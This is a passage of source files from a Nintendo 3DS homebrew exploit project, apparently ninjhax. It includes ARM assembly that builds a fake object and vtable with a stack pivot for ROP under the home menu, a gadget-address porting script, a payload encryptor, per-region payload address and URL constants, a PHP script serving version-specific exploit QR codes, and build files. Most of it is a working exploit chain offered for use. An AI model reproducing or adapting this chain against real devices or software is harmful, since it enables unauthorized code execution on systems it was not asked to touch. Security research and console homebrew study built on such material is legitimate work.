13 | ; our stack pivot works by loading a bunch of registers from [r4]
14 | ; fortunately we know r4 = object + 0x4, so we manufacture our object accordingly
15 | ; and then we get ROP under home menu !
16 | 
17 | .orga 0x0
18 | 
19 | 	object:
20 | 		.word MENU_OBJECT_LOC + vtable - object ; pointer to manufactured vtable, and new sp
21 | 		.word ROP_MENU_POP_PC ; pc (pop {pc} to jump to ROP)
22 | 
23 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
24 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
25 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
26 | 		.word 0xDEADCAFE ; filler to avoid having stuff overwritten
27 | 
28 | 	vtable: ; also initial ROP
29 | 		.word ROP_MENU_POP_R4R5PC ; pop {r4, r5, pc} : skip pivot
30 | 			.word MENU_OBJECT_LOC + ropload_stackpivot - object + 0x1c ; r4
31 | 			.word ROP_MENU_STACK_PIVOT ; stack pivot ; also r5 (garbage)
32 | 	rop:
33 | 		.word ROP_MENU_STACK_PIVOT ; stack-pivot to the main ROP from the ropbin.
34 | 
35 | 	ropload_stackpivot:
36 | 		.word 0, 0, 0, 0, 0, 0
37 | 		.word MENU_LOADEDROP_BUFADR ; sp
38 | 		.word ROP_MENU_POP_PC ; pc
39 | 
40 | 	.fill ((object + 0x60) - .), 0x0
41 | 
42 | .Close
43 | 


--------------------------------------------------------------------------------
/scripts/portRopDb.py:
--------------------------------------------------------------------------------
 1 | from datetime import datetime
 2 | import sys
 3 | import ast
 4 |  
 5 | def getWord(b, k, n=4):
 6 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 7 | 
 8 | def findPattern(p, t, addr, size):
 9 | 	pattern = []
10 | 	for i in range(size):
11 | 		pattern += [getWord(p, addr + i*4, 4)]
12 | 	k = 0
13 | 	# not a perfect pattern search, but most likely good enough
14 | 	for i in range(0, len(t), 4):
15 | 		candidate = getWord(t, i, 4)
16 | 		if candidate == pattern[k]:
17 | 			if k+1 == size:
18 | 				return i-k*4
19 | 			else:
20 | 				k += 1
21 | 		elif candidate == pattern[0]:
22 | 			k = 1
23 | 		else:
24 | 			k = 0
25 | 	return None
26 | 
27 | def outputConstantsTxt(d):
28 | 	out="[\n"
29 | 	for k in d:
30 | 		out+="(\""+k[0]+"\", \""+str(k[1])+"\"),\n"
31 | 	out+="]\n"
32 | 	return out
33 | 
34 | if len(sys.argv)<4:
35 | 	print("use : "+sys.argv[0]+" <proto_code.bin> <target_code.bin> <code_base_addr> <proto_ropdb_file> <output.txt>")
36 | 	exit()
37 | 
38 | l = ast.literal_eval(open(sys.argv[-2],"r").read())
39 | 
40 | base = int(sys.argv[3], 0)
41 | proto = bytearray(open(sys.argv[1], "rb").read())
42 | target = bytearray(open(sys.argv[2], "rb").read())
43 | 
44 | out = []
45 | 
46 | for entry in l:
47 | 	if len(entry) == 3:
48 | 		# gadget search
49 | 		(name, in_addr, in_size) = entry
50 | 		print(name)
51 | 		out_addr = findPattern(proto, target, in_addr - base, in_size) + base
52 | 		out += [(name, hex(out_addr))]
53 | 	if len(entry) == 4:
54 | 		# const ptr search
55 | 		(name, in_addr, in_size, in_offset) = entry
56 | 		out_addr = findPattern(proto, target, in_addr - base, in_size)
57 | 		out_addr = getWord(target, out_addr + in_offset*4, 4)
58 | 		out += [(name, hex(out_addr))]
59 | 
60 | open(sys.argv[-1],"w").write(outputConstantsTxt(out))
61 | 


--------------------------------------------------------------------------------
/scripts/blowfish.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import sys
 3 | import struct
 4 | import ctypes
 5 | 
 6 | def getWord(b, k, n=4):
 7 | 	return sum(list(map(lambda c: b[k+c]<<(c*8),range(n))))
 8 | 
 9 | def loadSP(fn):
10 | 	f=open(fn,"rb")
11 | 
12 | 	P=[]
13 | 	for i in range(18):
14 | 		P.append(struct.unpack("I",f.read(4))[0])
15 | 
16 | 	S=[[],[],[],[]]
17 | 
18 | 	for i in range(4):
19 | 		for j in range(256):
20 | 			S[i].append(struct.unpack("I",f.read(4))[0])
21 | 
22 | 	f.close()
23 | 
24 | 	return S, P
25 | 
26 | # 2 functions stolen from http://felipetonello.com/scripts/python/blowfish.txt
27 | def F(S, P, xl):
28 | 	a = (xl & 0xFF000000) >> 24
29 | 	b = (xl & 0x00FF0000) >> 16
30 | 	c = (xl & 0x0000FF00) >> 8
31 | 	d = xl & 0x000000FF
32 | 	return ((S[0][a] + S[1][b]) ^ S[2][c]) + S[3][d];
33 | 
34 | def cipher(S, P, xl, xr, direction):
35 | 	if direction == 0: #ENCRYPT
36 | 		for i in range (16):
37 | 			xl = xl ^ P[i]
38 | 			xr = F(S,P,xl) ^ xr
39 | 			xl, xr = xr, xl
40 | 		xl, xr = xr, xl
41 | 		xr = xr ^ P[16]
42 | 		xl = xl ^ P[17]
43 | 	else: #DECRYPT
44 | 		for i in range (17, 1, -1):
45 | 			xl = xl ^ P[i]
46 | 			xr = F(S,P,xl) ^ xr
47 | 			xl, xr = xr, xl
48 | 		xl, xr = xr, xl
49 | 		xr = xr ^ P[1]
50 | 		xl = xl ^ P[0]
51 | 	return xl, xr
52 | 
53 | def encrypt(din,dout):
54 | 	l=len(din)
55 | 	for k in range(0,l,8):
56 | 		l=getWord(din,k)
57 | 		r=getWord(din,k+4)
58 | 		ret=cipher(S,P,l,r,0)
59 | 		dout[(k):(k+4)]=struct.pack("I",ret[0]&0xFFFFFFFF)
60 | 		dout[(k+4):(k+8)]=struct.pack("I",ret[1]&0xFFFFFFFF)
61 | 
62 | path="./"
63 | if len(sys.argv)>3:
64 | 	path=sys.argv[3]
65 | 
66 | data=bytearray(open(sys.argv[1],"rb").read())
67 | 
68 | padding=8-(len(data)%8)
69 | for k in range(padding):
70 | 	data.append(0)
71 | 
72 | dataOut=data[:]
73 | (S,P)=loadSP(path+"/blowfish_processed.bin")
74 | encrypt(data,dataOut)
75 | 
76 | open(sys.argv[2],"wb").write(dataOut)
77 | 


--------------------------------------------------------------------------------
/cn_constants/WEST/constants.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | 	("CN_GSPHEAP", "0x14000000"),
 3 | 
 4 | 	("CN_FSHANDLE_ADR", "0x00334828"),
 5 | 
 6 | 	("CN_GSPHANDLE_ADR", "0x00334F28"),
 7 | 	("CN_GSPSHAREDBUF_ADR", "(0x356208+0x58)"),
 8 | 	
 9 | 	("CN_SRVHANDLE_ADR", "0x00334F6C"),
10 | 	
11 | 	("CN_APTLOCKHANDLE_ADR", "0x00334720"),
12 | 
13 | 	("CN_HIDMEMHANDLE_ADR", "0x0034EC98"),
14 | 	("CN_GSPMEMHANDLE_ADR", "0x00356254"),
15 | 
16 | 	("CN_DATABSS_START", "(0x0031A000)"),
17 | 	("CN_DATABSS_SIZE", "(0x2773C+0x20070)"),
18 | 
19 | 	("CN_HEAPSIZE", "0x01d9a000"),
20 | 
21 | 	("CN_GSPGPU_FlushDataCache_ADR", "0x002D15D4"),
22 | 	("CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue", "0x001C2B54"),
23 | 
24 | 	("CN_INITIALCODE_OFFSET", "0x001D9700"),
25 | 
26 | 	#for QR code menu crash
27 | 	("CN_STACKPAYLOADADR_SAVE", "0x0FFFFA64"),
28 | 	("CN_HEAPPAYLOADADR_SAVE", "0x8E3D968"),
29 | 	# for edit => my data menu crash
30 | 	# ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFC5C"),
31 | 	# ("CN_HEAPPAYLOADADR_SAVE", "0x8F1D9C8"),
32 | 
33 | 	("CN_STACKPAYLOADADR", "0x0FFFFA64"),
34 | 	("CN_HEAPPAYLOADADR", "0x8E3D968"),
35 | 
36 | 	("CN_CODELOCATIONPAOFF", "(0x100000)"),
37 | 	("CN_CODELOCATIONGSP", "(CN_GSPHEAP+CN_CODELOCATIONPAOFF)"),
38 | 
39 | 	("CN_TOPFBADR1", "(0x1444B9C0)"),
40 | 	("CN_TOPFBADR2", "(0x14491EE0)"),
41 | 
42 | 	("CN_TOTALPAGES", "0x262"),
43 | 	("CN_ADDPAGES", "0x0"),
44 | 	("CN_NEWTOTALPAGES", "(CN_TOTALPAGES+CN_ADDPAGES)"),
45 | 	("CN_ALLOCPAGES_ADR", "0x138F0000"),
46 | 
47 | 	("CN_BOOTLOADER_LOC", "0x00100000"),
48 | 	("CN_MENULOADER_LOC", "0x00101000"),
49 | 	("CN_ARGSETTER_LOC", "0x00102000"),
50 | 	("CN_ARGCV_LOC", "0x00103000"),
51 | 	("CN_HBHANDLE_LOC", "0x00106000"),
52 | 	("CN_SERVICESTRUCT_LOC", "0x00107000"),
53 | 
54 | 	("CN_3DSX_LOADADR", "0x00108000"),
55 | 	("CN_TOTAL3DSXPAGES", "(CN_NEWTOTALPAGES-(CN_3DSX_LOADADR-0x00100000)/0x1000)"),
56 | 
57 | 	# ("CN_NINJHAX_URL", "\"http://smealum.net/regionFOUR_dev/p/\"")
58 | 	("CN_NINJHAX_URL", "\"http://192.168.109.1/\"")
59 | ]
60 | 


--------------------------------------------------------------------------------
/cn_constants/JPN/constants.txt:
--------------------------------------------------------------------------------
 1 | [
 2 | 	("CN_GSPHEAP", "0x14000000"),
 3 | 
 4 | 	("CN_FSHANDLE_ADR", "0x00341378"),
 5 | 
 6 | 	("CN_GSPHANDLE_ADR", "0x00341A78"),
 7 | 	("CN_GSPSHAREDBUF_ADR", "(0x362DA8+0x58)"),
 8 | 	
 9 | 	("CN_SRVHANDLE_ADR", "0x00341AC0"),
10 | 	
11 | 	("CN_APTLOCKHANDLE_ADR", "0x00341258"),
12 | 
13 | 	("CN_HIDMEMHANDLE_ADR", "0x0035B7C0"),
14 | 	("CN_GSPMEMHANDLE_ADR", "0x00362DF4"),
15 | 
16 | 	("CN_DATABSS_START", "(0x00324000)"),
17 | 	("CN_DATABSS_SIZE", "(0x0002A2A8+0x000200C4)"),
18 | 
19 | 	("CN_HEAPSIZE", "0x01D8D000"),
20 | 
21 | 	("CN_GSPGPU_FlushDataCache_ADR", "0x002DAAC4"),
22 | 	("CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue", "0x001C5B1C"),
23 | 
24 | 	# careful about that as this address does contain some code/data
25 | 	("CN_INITIALCODE_OFFSET", "0x00080000"),
26 | 
27 | 	#for QR code menu crash
28 | 	("CN_STACKPAYLOADADR_SAVE", "0x0FFFFA64"),
29 | 	("CN_HEAPPAYLOADADR_SAVE", "0x8E3D968"),
30 | 	# for edit => my data menu crash
31 | 	# ("CN_STACKPAYLOADADR_SAVE", "0x0FFFFC5C"),
32 | 	# ("CN_HEAPPAYLOADADR_SAVE", "0x8F1D9C8"),
33 | 
34 | 	("CN_STACKPAYLOADADR", "0x0FFFFA64"),
35 | 	("CN_HEAPPAYLOADADR", "0x8E3D928"),
36 | 
37 | 	("CN_CODELOCATIONPAOFF", "(0x100000)"),
38 | 	("CN_CODELOCATIONGSP", "(CN_GSPHEAP+CN_CODELOCATIONPAOFF)"),
39 | 
40 | 	("CN_TOPFBADR1", "(0x1444B9C0)"),
41 | 	("CN_TOPFBADR2", "(0x14491EE0)"),
42 | 
43 | 	("CN_TOTALPAGES", "0x26F"),
44 | 	("CN_ADDPAGES", "0x0"),
45 | 	("CN_NEWTOTALPAGES", "(CN_TOTALPAGES+CN_ADDPAGES)"),
46 | 	("CN_ALLOCPAGES_ADR", "0x138F0000"),
47 | 
48 | 	("CN_BOOTLOADER_LOC", "0x00100000"),
49 | 	("CN_MENULOADER_LOC", "0x00101000"),
50 | 	("CN_ARGSETTER_LOC", "0x00102000"),
51 | 	("CN_ARGCV_LOC", "0x00103000"),
52 | 	("CN_HBHANDLE_LOC", "0x00106000"),
53 | 	("CN_SERVICESTRUCT_LOC", "0x00107000"),
54 | 
55 | 	("CN_3DSX_LOADADR", "0x00108000"),
56 | 	("CN_TOTAL3DSXPAGES", "(CN_NEWTOTALPAGES-(CN_3DSX_LOADADR-0x00100000)/0x1000)"),
57 | 
58 | 	("CN_NINJHAX_URL", "\"http://smealum.net/regionfour/p/\"")
59 | ]
60 | 


--------------------------------------------------------------------------------
/web/qr_code.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | 
  3 | error_reporting(0);
  4 | 
  5 | function getCnVersion($v)
  6 | {
  7 | 	if($v[4]=="J")
  8 | 	{
  9 | 		return "JPN";
 10 | 	}else{
 11 | 		return "WEST";
 12 | 	}
 13 | }
 14 | 
 15 | function getFirmVersion($v)
 16 | {
 17 | 	if($v[5]=="NEW")
 18 | 	{
 19 | 		return "N3DS";
 20 | 	}else{
 21 | 		if($v[0]<5)
 22 | 		{
 23 | 			return "PRE5";
 24 | 		}else{
 25 | 			return "POST5";
 26 | 		}
 27 | 	}
 28 | }
 29 | 
 30 | function getMenuVersion($v)
 31 | {
 32 | 	if($v[0]==9)
 33 | 	{
 34 | 		if ($v[1]==0 || $v[1]==1)
 35 | 		{
 36 | 			return "11272";
 37 | 		}
 38 | 		else if($v[1]==2)
 39 | 		{
 40 | 			return "12288";
 41 | 		}
 42 | 		else if($v[1]==3 || $v[1]==4)
 43 | 		{
 44 | 			return "13330";
 45 | 		}
 46 | 		else if($v[1]==5)
 47 | 		{
 48 | 			return "15360";
 49 | 		}
 50 | 		else if($v[1]==6)
 51 | 		{
 52 | 			return "16404";
 53 | 		}
 54 | 		else if($v[1]==7)
 55 | 		{
 56 | 			return "17415";
 57 | 		}
 58 | 		else if($v[1]==8)
 59 | 		{
 60 | 			return "19456";
 61 | 		}
 62 | 	}
 63 | 	return "unsupported";
 64 | }
 65 | 
 66 | $version = array(
 67 | 		0 => $_POST['zero'],
 68 | 		1 => $_POST['one'],
 69 | 		2 => $_POST['two'],
 70 | 		3 => $_POST['three'],
 71 | 		4 => $_POST['four'],
 72 | 		5 => $_POST['five']
 73 | 	);
 74 | 
 75 | $filename="./unsupported.png";
 76 | 
 77 | // check that version is valid-ish
 78 | if(is_numeric($version[0]) && is_numeric($version[1]) && is_numeric($version[2]) && is_numeric($version[3]))
 79 | {
 80 | 	$filename="./q/".getFirmVersion($version)."_".getCnVersion($version)."_".getMenuVersion($version).".png";
 81 | }
 82 | 
 83 | if(!file_exists($filename))
 84 | {
 85 | 	$filename="./unsupported.png";
 86 | }
 87 | 
 88 | $fp = fopen($filename, 'rb');
 89 | 
 90 | // // send the right headers
 91 | header("Content-Type: image/png");
 92 | header("Content-Length: " . filesize($filename));
 93 | 
 94 | // dump the picture and stop the script
 95 | fpassthru($fp);
 96 | 
 97 | exit;
 98 | 
 99 | ?>
100 | 


--------------------------------------------------------------------------------
/scripts/buildVersion.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | import re
 4 | 
 5 | def getRoVersion(v):
 6 | 	if v[0]<4:
 7 | 		return "0"
 8 | 	elif v[0]<5:
 9 | 		return "1024"
10 | 	elif not(v[0]>=7 and v[1]>=2) and v[0]<=7:
11 | 		return "2049"
12 | 	elif v[0]<8:
13 | 		return "3074"
14 | 	else:
15 | 		return "4096"
16 | 
17 | def getMenuVersion(v):
18 | 	if v[0]==9:
19 | 		if (v[1]==0 or v[1]==1):
20 | 			return "11272"
21 | 		elif v[1]==2:
22 | 			return "12288"
23 | 		elif (v[1]==3 or v[1]==4):
24 | 			return "13330"
25 | 		elif v[1]==5:
26 | 			return "15360"
27 | 		elif v[1]==6:
28 | 			return "16404"
29 | 		elif v[1]==7:
30 | 			return "17415"
31 | 		elif v[1]==8 or (v[1]>=8 and v[4]!="U"):
32 | 			return "19456"
33 | 		elif (v[1]==9 and v[4]=="U"):
34 | 			return "20480_usa"
35 | 	return "unsupported"
36 | 
37 | def getSpiderVersion(v):
38 | 	if v[5]==1:
39 | 		return "SKATER_10"
40 | 	else:
41 | 		if v[3]<7:
42 | 			return "1024"
43 | 		elif v[3]<11:
44 | 			return "2050"
45 | 		elif v[3]<16:
46 | 			return "3074"
47 | 		else:
48 | 			return "4096"
49 | 
50 | def getCnVersion(v):
51 | 	if v[4]=="J":
52 | 		return "JPN"
53 | 	else:
54 | 		return "WEST"
55 | 
56 | def getFirmVersion(v):
57 | 	if v[5]==1:
58 | 		return "N3DS"
59 | 	else:
60 | 		if v[0]<5:
61 | 			return "PRE5"
62 | 		else:
63 | 			return "POST5"
64 | 
65 | 
66 | #format : "X.X.X-XR"
67 | version=sys.argv[1]
68 | p=re.compile("^([N]?)([0-9]+)\.([0-9]+)\.([0-9]+)-([0-9]+)([EUJ])")
69 | r=p.match(version)
70 | 
71 | if r:
72 | 	new3DS=(1 if (r.group(1)=="N") else 0)
73 | 	cverMajor=int(r.group(2))
74 | 	cverMinor=int(r.group(3))
75 | 	cverMicro=int(r.group(4))
76 | 	nupVersion=int(r.group(5))
77 | 	nupRegion=r.group(6)
78 | 	extraparams=""
79 | 	for arg in sys.argv:
80 | 		if(arg=="--enableloadropbin"):
81 | 			extraparams+=" LOADROPBIN=1"
82 | 		if(arg=="--enableotherapp"):
83 | 			extraparams+=" OTHERAPP=1"
84 | 	v=(cverMajor, cverMinor, cverMicro, nupVersion, nupRegion, new3DS)
85 | 	os.system("make clean")	
86 | 	os.system("make CNVERSION="+getCnVersion(v)+" ROVERSION="+getRoVersion(v)+" SPIDERVERSION="+getSpiderVersion(v)+" FIRMVERSION="+getFirmVersion(v)+" MENUVERSION="+getMenuVersion(v)+extraparams)
87 | else:
88 | 	print("invalid version format; learn2read.")
89 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/cn_initial/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | CC = arm-none-eabi-gcc
14 | # LINK = arm-none-eabi-gcc
15 | LINK = arm-none-eabi-ld
16 | AS = arm-none-eabi-as
17 | OBJCOPY = arm-none-eabi-objcopy
18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include
19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map
20 | 
21 | CFILES = $(wildcard source/*.c)
22 | BINFILES = $(wildcard data/*.bin)
23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
24 | OFILES += $(CFILES:source/%.c=build/%.o)
25 | DFILES = $(CFILES:source/%.c=build/%.d)
26 | SFILES = $(wildcard source/*.s)
27 | OFILES += $(SFILES:source/%.s=build/%.o)
28 | PROJECTNAME = ${shell basename "$(CURDIR)"}
29 | CWD = "$(CURDIR)""
30 | 
31 | #---------------------------------------------------------------------------------
32 | # canned command sequence for binary data, taken from devkitARM
33 | #---------------------------------------------------------------------------------
34 | define bin2o
35 | 	bin2s $< | $(AS) -o $(@)
36 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
37 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
38 | 	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
39 | endef
40 | 
41 | .PHONY:=all dirs
42 | 
43 | all: dirs $(PROJECTNAME).bin
44 | 
45 | dirs:
46 | 	@mkdir -p build
47 | 
48 | ctrulib:
49 | 	cd "$(CTRULIB)" && make
50 | 
51 | $(PROJECTNAME).bin: $(PROJECTNAME).elf
52 | 	$(OBJCOPY) -O binary $< $@
53 | 
54 | $(PROJECTNAME).elf: $(OFILES) ctrulib
55 | 	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru -lm -lc -lg
56 | 
57 | clean:
58 | 	@rm -f build/*.o build/*.d
59 | 	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
60 | 	@echo "all cleaned up !"
61 | 
62 | -include $(DFILES)
63 | 
64 | build/%.o: source/%.c
65 | 	$(CC) $(CFLAGS) -c $< -o $@
66 | 	@$(CC) -MM $< > build/$*.d
67 | 
68 | build/%.o: source/%.s
69 | 	$(CC) $(CFLAGS) -c $< -o $@
70 | 	@$(CC) -MM $< > build/$*.d
71 | 
72 | build/%.bin.o: data/%.bin
73 | 	@echo $(notdir $<)
74 | 	@$(bin2o)
75 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | CC = arm-none-eabi-gcc
14 | # LINK = arm-none-eabi-gcc
15 | LINK = arm-none-eabi-ld
16 | AS = arm-none-eabi-as
17 | OBJCOPY = arm-none-eabi-objcopy
18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include
19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map
20 | 
21 | CFILES = $(wildcard source/*.c)
22 | BINFILES = $(wildcard data/*.bin)
23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
24 | OFILES += $(CFILES:source/%.c=build/%.o)
25 | DFILES = $(CFILES:source/%.c=build/%.d)
26 | SFILES = $(wildcard source/*.s)
27 | OFILES += $(SFILES:source/%.s=build/%.o)
28 | PROJECTNAME = ${shell basename "$(CURDIR)"}
29 | CWD = "$(CURDIR)""
30 | 
31 | #---------------------------------------------------------------------------------
32 | # canned command sequence for binary data, taken from devkitARM
33 | #---------------------------------------------------------------------------------
34 | define bin2o
35 | 	bin2s $< | $(AS) -o $(@)
36 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
37 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
38 | 	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
39 | endef
40 | 
41 | .PHONY:=all dirs
42 | 
43 | all: dirs $(PROJECTNAME).bin
44 | 
45 | dirs:
46 | 	@mkdir -p build
47 | 
48 | ctrulib:
49 | 	cd "$(CTRULIB)" && make
50 | 
51 | $(PROJECTNAME).bin: $(PROJECTNAME).elf
52 | 	$(OBJCOPY) -O binary $< $@
53 | 
54 | $(PROJECTNAME).elf: $(OFILES) ctrulib
55 | 	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru -lm -lc -lg
56 | 
57 | clean:
58 | 	@rm -f build/*.o build/*.d
59 | 	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
60 | 	@echo "all cleaned up !"
61 | 
62 | -include $(DFILES)
63 | 
64 | build/%.o: source/%.c
65 | 	$(CC) $(CFLAGS) -c $< -o $@
66 | 	@$(CC) -MM $< > build/$*.d
67 | 
68 | build/%.o: source/%.s
69 | 	$(CC) $(CFLAGS) -c $< -o $@
70 | 	@$(CC) -MM $< > build/$*.d
71 | 
72 | build/%.bin.o: data/%.bin
73 | 	@echo $(notdir $<)
74 | 	@$(bin2o)
75 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/JPN/cn_initial/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | CC = arm-none-eabi-gcc
14 | # LINK = arm-none-eabi-gcc
15 | LINK = arm-none-eabi-ld
16 | AS = arm-none-eabi-as
17 | OBJCOPY = arm-none-eabi-objcopy
18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include
19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map
20 | 
21 | CFILES = $(wildcard source/*.c)
22 | BINFILES = $(wildcard data/*.bin)
23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
24 | OFILES += $(CFILES:source/%.c=build/%.o)
25 | DFILES = $(CFILES:source/%.c=build/%.d)
26 | SFILES = $(wildcard source/*.s)
27 | OFILES += $(SFILES:source/%.s=build/%.o)
28 | PROJECTNAME = ${shell basename "$(CURDIR)"}
29 | CWD = "$(CURDIR)""
30 | 
31 | #---------------------------------------------------------------------------------
32 | # canned command sequence for binary data, taken from devkitARM
33 | #---------------------------------------------------------------------------------
34 | define bin2o
35 | 	bin2s $< | $(AS) -o $(@)
36 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
37 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
38 | 	echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
39 | endef
40 | 
41 | .PHONY:=all dirs
42 | 
43 | all: dirs $(PROJECTNAME).bin
44 | 
45 | dirs:
46 | 	@mkdir -p build
47 | 
48 | ctrulib:
49 | 	cd "$(CTRULIB)" && make
50 | 
51 | $(PROJECTNAME).bin: $(PROJECTNAME).elf
52 | 	$(OBJCOPY) -O binary $< $@
53 | 
54 | $(PROJECTNAME).elf: $(OFILES) ctrulib
55 | 	$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES)) -g -lctru -lm -lc -lg
56 | 
57 | clean:
58 | 	@rm -f build/*.o build/*.d
59 | 	@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin
60 | 	@echo "all cleaned up !"
61 | 
62 | -include $(DFILES)
63 | 
64 | build/%.o: source/%.c
65 | 	$(CC) $(CFLAGS) -c $< -o $@
66 | 	@$(CC) -MM $< > build/$*.d
67 | 
68 | build/%.o: source/%.s
69 | 	$(CC) $(CFLAGS) -c $< -o $@
70 | 	@$(CC) -MM $< > build/$*.d
71 | 
72 | build/%.bin.o: data/%.bin
73 | 	@echo $(notdir $<)
74 | 	@$(bin2o)
75 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(DEVKITARM)),)
 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
 3 | endif
 4 | 
 5 | ifeq ($(strip $(CTRULIB)),)
 6 | $(error "Please set CTRULIB in your environment. export DEVKITARM=<path to>ctrulib/libctru")
 7 | endif
 8 | 
 9 | ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
10 | export PATH:=$(DEVKITARM)/bin:$(PATH)
11 | endif
12 | 
13 | CC = arm-none-eabi-gcc
14 | # LINK = arm-none-eabi-gcc
15 | LINK = arm-none-eabi-ld
16 | AS = arm-none-eabi-as
17 | OBJCOPY = arm-none-eabi-objcopy
18 | CFLAGS += -Wall -std=c99 -march=armv6 -Os -I"$(CTRULIB)/include" -I$(DEVKITPRO)/libnds/include
19 | LDFLAGS += --script=ccd00.ld -L"$(DEVKITARM)/arm-none-eabi/lib" -L"$(CTRULIB)/lib" -Map=output.map
20 | 
21 | CFILES = $(wildcard source/*.c)
22 | BINFILES = $(wildcard data/*.bin)
23 | OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
24 | OFILES += $(CFILES:source/%.c=build/%.o)
25 | DFILES = $(CFILES:source/%.c=build/%.d)
26 | SFILES = $(wildcard source/*.s)
27 | OFILES += $(SFILES:source/%.s=build/%.o)
28 | PROJECTNAME = ${shell basename "$(CURDIR)"}
29 | CWD = "$(CURDIR)""
30 | 
31 | #---------------------------------------------------------------------------------
32 | # canned command sequence for binary data, taken from devkitARM
33 | #---------------------------------------------------------------------------------
34 | define bin2o
35 | 	bin2s $< | $(AS) -o $(@)
36 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
37 | 	echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
